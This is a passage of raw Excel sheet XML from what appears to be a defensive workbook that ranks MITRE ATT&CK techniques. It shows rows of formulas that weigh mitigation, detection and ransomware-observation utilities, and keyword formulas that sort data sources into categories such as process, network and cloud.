        <f t="array" ref="AK273">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD273)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL273" s="37">
        <v>269</v>
      </c>
      <c r="AM273" s="37" t="str" cm="1">
        <f t="array" ref="AM273">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD273)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN273" s="37">
        <v>0</v>
      </c>
      <c r="AO273" s="37">
        <v>0</v>
      </c>
      <c r="AP273" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ273" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>114.53814652380953</v>
      </c>
      <c r="AR273" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS273" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT273" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU27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74" spans="1:47" ht="51">
      <c r="A274" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B274" s="37">
        <f t="shared" si="4"/>
        <v>416.95729728571428</v>
      </c>
      <c r="C274" s="37" t="s">
        <v>968</v>
      </c>
      <c r="D274" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E274" s="37" t="s">
        <v>969</v>
      </c>
      <c r="F274" s="37">
        <v>1</v>
      </c>
      <c r="G274" s="37">
        <v>1</v>
      </c>
      <c r="H274" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I274" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J274" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K274" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L274" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M274" s="37">
        <v>0</v>
      </c>
      <c r="N274" s="56">
        <v>0</v>
      </c>
      <c r="O274" s="56">
        <v>8</v>
      </c>
      <c r="P274" s="56">
        <v>4</v>
      </c>
      <c r="Q274" s="56">
        <v>12</v>
      </c>
      <c r="R274" s="57" t="s">
        <v>738</v>
      </c>
      <c r="S274" s="57">
        <v>7</v>
      </c>
      <c r="T274" s="57" t="s">
        <v>965</v>
      </c>
      <c r="U274" s="57">
        <v>11</v>
      </c>
      <c r="V274" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.28571442857142859</v>
      </c>
      <c r="W274" s="37">
        <v>18</v>
      </c>
      <c r="X274" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y274" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z274" s="37">
        <v>24</v>
      </c>
      <c r="AA274" s="37">
        <v>0.24</v>
      </c>
      <c r="AB274" s="37">
        <v>0.24</v>
      </c>
      <c r="AC274" s="37"/>
      <c r="AD274" s="50" t="s">
        <v>970</v>
      </c>
      <c r="AE274" s="37" t="str" cm="1">
        <f t="array" ref="AE274">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD274)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF274" s="37">
        <v>270</v>
      </c>
      <c r="AG274" s="37" t="str" cm="1">
        <f t="array" ref="AG274">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD274)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH274" s="37">
        <v>270</v>
      </c>
      <c r="AI274" s="37" t="str" cm="1">
        <f t="array" ref="AI274">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD274)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ274" s="37">
        <v>270</v>
      </c>
      <c r="AK274" s="37" t="str" cm="1">
        <f t="array" ref="AK274">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD274)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL274" s="37">
        <v>270</v>
      </c>
      <c r="AM274" s="37" t="str" cm="1">
        <f t="array" ref="AM274">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD274)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN274" s="37">
        <v>0</v>
      </c>
      <c r="AO274" s="37">
        <v>1</v>
      </c>
      <c r="AP274" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ274" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>138.98576576190476</v>
      </c>
      <c r="AR274" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS274" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT274" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU27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3.3329944229024941</v>
      </c>
    </row>
    <row r="275" spans="1:47" ht="51">
      <c r="A275" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B275" s="37">
        <f t="shared" si="4"/>
        <v>377.16671833333328</v>
      </c>
      <c r="C275" s="37" t="s">
        <v>971</v>
      </c>
      <c r="D275" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E275" s="37" t="s">
        <v>972</v>
      </c>
      <c r="F275" s="37">
        <v>1</v>
      </c>
      <c r="G275" s="37">
        <v>1</v>
      </c>
      <c r="H275" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I275" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J275" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K275" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L275" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M275" s="37">
        <v>0</v>
      </c>
      <c r="N275" s="56">
        <v>0</v>
      </c>
      <c r="O275" s="56">
        <v>9</v>
      </c>
      <c r="P275" s="56">
        <v>0</v>
      </c>
      <c r="Q275" s="56">
        <v>9</v>
      </c>
      <c r="R275" s="57" t="s">
        <v>973</v>
      </c>
      <c r="S275" s="57">
        <v>8</v>
      </c>
      <c r="T275" s="57" t="s">
        <v>974</v>
      </c>
      <c r="U275" s="57">
        <v>9</v>
      </c>
      <c r="V275" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.24761909523809522</v>
      </c>
      <c r="W275" s="37">
        <v>17</v>
      </c>
      <c r="X275" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y275" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z275" s="37">
        <v>18</v>
      </c>
      <c r="AA275" s="37">
        <v>0.18</v>
      </c>
      <c r="AB275" s="37">
        <v>0.18</v>
      </c>
      <c r="AC275" s="37"/>
      <c r="AD275" s="50" t="s">
        <v>975</v>
      </c>
      <c r="AE275" s="37" t="str" cm="1">
        <f t="array" ref="AE275">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD275)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF275" s="37">
        <v>271</v>
      </c>
      <c r="AG275" s="37" t="str" cm="1">
        <f t="array" ref="AG275">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD275)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH275" s="37">
        <v>271</v>
      </c>
      <c r="AI275" s="37" t="str" cm="1">
        <f t="array" ref="AI275">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD275)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ275" s="37">
        <v>271</v>
      </c>
      <c r="AK275" s="37" t="str" cm="1">
        <f t="array" ref="AK275">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD275)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL275" s="37">
        <v>271</v>
      </c>
      <c r="AM275" s="37" t="str" cm="1">
        <f t="array" ref="AM275">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD275)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN275" s="37">
        <v>0</v>
      </c>
      <c r="AO275" s="37">
        <v>2</v>
      </c>
      <c r="AP275" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ275" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>125.72223944444443</v>
      </c>
      <c r="AR275" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS275" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT275" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU27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6.0343923544973528</v>
      </c>
    </row>
    <row r="276" spans="1:47" ht="34">
      <c r="A276" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B276" s="37">
        <f t="shared" si="4"/>
        <v>321.51444128571427</v>
      </c>
      <c r="C276" s="37" t="s">
        <v>976</v>
      </c>
      <c r="D276" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E276" s="37" t="s">
        <v>977</v>
      </c>
      <c r="F276" s="37">
        <v>1</v>
      </c>
      <c r="G276" s="37">
        <v>1</v>
      </c>
      <c r="H276" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I276" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J276" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K276" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L276" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M276" s="37">
        <v>0</v>
      </c>
      <c r="N276" s="56">
        <v>0</v>
      </c>
      <c r="O276" s="56">
        <v>1</v>
      </c>
      <c r="P276" s="56">
        <v>0</v>
      </c>
      <c r="Q276" s="56">
        <v>4</v>
      </c>
      <c r="R276" s="57" t="s">
        <v>738</v>
      </c>
      <c r="S276" s="57">
        <v>7</v>
      </c>
      <c r="T276" s="57" t="s">
        <v>965</v>
      </c>
      <c r="U276" s="57">
        <v>11</v>
      </c>
      <c r="V276" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.1952382380952381</v>
      </c>
      <c r="W276" s="37">
        <v>18</v>
      </c>
      <c r="X276" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y276" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z276" s="37">
        <v>5</v>
      </c>
      <c r="AA276" s="37">
        <v>0.05</v>
      </c>
      <c r="AB276" s="37">
        <v>0.05</v>
      </c>
      <c r="AC276" s="37"/>
      <c r="AD276" s="50" t="s">
        <v>978</v>
      </c>
      <c r="AE276" s="37" t="str" cm="1">
        <f t="array" ref="AE276">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD276)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF276" s="37">
        <v>272</v>
      </c>
      <c r="AG276" s="37" t="str" cm="1">
        <f t="array" ref="AG276">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD276)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH276" s="37">
        <v>272</v>
      </c>
      <c r="AI276" s="37" t="str" cm="1">
        <f t="array" ref="AI276">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD276)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ276" s="37">
        <v>272</v>
      </c>
      <c r="AK276" s="37" t="str" cm="1">
        <f t="array" ref="AK276">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD276)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL276" s="37">
        <v>272</v>
      </c>
      <c r="AM276" s="37" t="str" cm="1">
        <f t="array" ref="AM276">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD276)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN276" s="37">
        <v>0</v>
      </c>
      <c r="AO276" s="37">
        <v>1</v>
      </c>
      <c r="AP276" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ276" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>107.17148042857143</v>
      </c>
      <c r="AR276" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS276" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT276" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU27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2.5755114387755098</v>
      </c>
    </row>
    <row r="277" spans="1:47" ht="34">
      <c r="A277" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B277" s="37">
        <f t="shared" si="4"/>
        <v>338.30967995238098</v>
      </c>
      <c r="C277" s="37" t="s">
        <v>979</v>
      </c>
      <c r="D277" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E277" s="37" t="s">
        <v>980</v>
      </c>
      <c r="F277" s="37">
        <v>1</v>
      </c>
      <c r="G277" s="37">
        <v>1</v>
      </c>
      <c r="H277" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I277" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J277" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K277" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L277" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M277" s="37">
        <v>0</v>
      </c>
      <c r="N277" s="56">
        <v>0</v>
      </c>
      <c r="O277" s="56">
        <v>1</v>
      </c>
      <c r="P277" s="56">
        <v>1</v>
      </c>
      <c r="Q277" s="56">
        <v>6</v>
      </c>
      <c r="R277" s="57" t="s">
        <v>738</v>
      </c>
      <c r="S277" s="57">
        <v>7</v>
      </c>
      <c r="T277" s="57" t="s">
        <v>965</v>
      </c>
      <c r="U277" s="57">
        <v>11</v>
      </c>
      <c r="V277" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20952395238095239</v>
      </c>
      <c r="W277" s="37">
        <v>18</v>
      </c>
      <c r="X277" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y277" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z277" s="37">
        <v>8</v>
      </c>
      <c r="AA277" s="37">
        <v>0.08</v>
      </c>
      <c r="AB277" s="37">
        <v>0.08</v>
      </c>
      <c r="AC277" s="37"/>
      <c r="AD277" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE277" s="37" t="str" cm="1">
        <f t="array" ref="AE277">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD277)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF277" s="37">
        <v>273</v>
      </c>
      <c r="AG277" s="37" t="str" cm="1">
        <f t="array" ref="AG277">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD277)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH277" s="37">
        <v>273</v>
      </c>
      <c r="AI277" s="37" t="str" cm="1">
        <f t="array" ref="AI277">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD277)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ277" s="37">
        <v>273</v>
      </c>
      <c r="AK277" s="37" t="str" cm="1">
        <f t="array" ref="AK277">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD277)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL277" s="37">
        <v>273</v>
      </c>
      <c r="AM277" s="37" t="str" cm="1">
        <f t="array" ref="AM277">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD277)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN277" s="37">
        <v>0</v>
      </c>
      <c r="AO277" s="37">
        <v>1</v>
      </c>
      <c r="AP277" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ277" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>112.76989331746033</v>
      </c>
      <c r="AR277" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS277" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT277" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU27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2.7088069837490552</v>
      </c>
    </row>
    <row r="278" spans="1:47" ht="51">
      <c r="A278" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B278" s="37">
        <f t="shared" si="4"/>
        <v>297.75709061904763</v>
      </c>
      <c r="C278" s="37" t="s">
        <v>981</v>
      </c>
      <c r="D278" s="50" t="s">
        <v>949</v>
      </c>
      <c r="E278" s="37" t="s">
        <v>982</v>
      </c>
      <c r="F278" s="37">
        <v>1</v>
      </c>
      <c r="G278" s="37">
        <v>1</v>
      </c>
      <c r="H278" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I278" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J278" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K278" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L278" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M278" s="37">
        <v>0</v>
      </c>
      <c r="N278" s="56">
        <v>2</v>
      </c>
      <c r="O278" s="56">
        <v>16</v>
      </c>
      <c r="P278" s="56">
        <v>2</v>
      </c>
      <c r="Q278" s="56">
        <v>6</v>
      </c>
      <c r="R278" s="57">
        <v>10.5</v>
      </c>
      <c r="S278" s="57">
        <v>1</v>
      </c>
      <c r="T278" s="57" t="s">
        <v>983</v>
      </c>
      <c r="U278" s="57">
        <v>4</v>
      </c>
      <c r="V278" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.17142852380952381</v>
      </c>
      <c r="W278" s="37">
        <v>5</v>
      </c>
      <c r="X278" s="37">
        <v>9.0909000000000004E-2</v>
      </c>
      <c r="Y278" s="37">
        <v>9.0909000000000004E-2</v>
      </c>
      <c r="Z278" s="37">
        <v>26</v>
      </c>
      <c r="AA278" s="37">
        <v>0.26</v>
      </c>
      <c r="AB278" s="37">
        <v>0.26</v>
      </c>
      <c r="AC278" s="37"/>
      <c r="AD278" s="50" t="s">
        <v>975</v>
      </c>
      <c r="AE278" s="37" t="str" cm="1">
        <f t="array" ref="AE278">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD278)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF278" s="37">
        <v>274</v>
      </c>
      <c r="AG278" s="37" t="str" cm="1">
        <f t="array" ref="AG278">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD278)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH278" s="37">
        <v>274</v>
      </c>
      <c r="AI278" s="37" t="str" cm="1">
        <f t="array" ref="AI278">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD278)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ278" s="37">
        <v>274</v>
      </c>
      <c r="AK278" s="37" t="str" cm="1">
        <f t="array" ref="AK278">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD278)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL278" s="37">
        <v>274</v>
      </c>
      <c r="AM278" s="37" t="str" cm="1">
        <f t="array" ref="AM278">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD278)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN278" s="37">
        <v>0</v>
      </c>
      <c r="AO278" s="37">
        <v>1</v>
      </c>
      <c r="AP278" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ278" s="37">
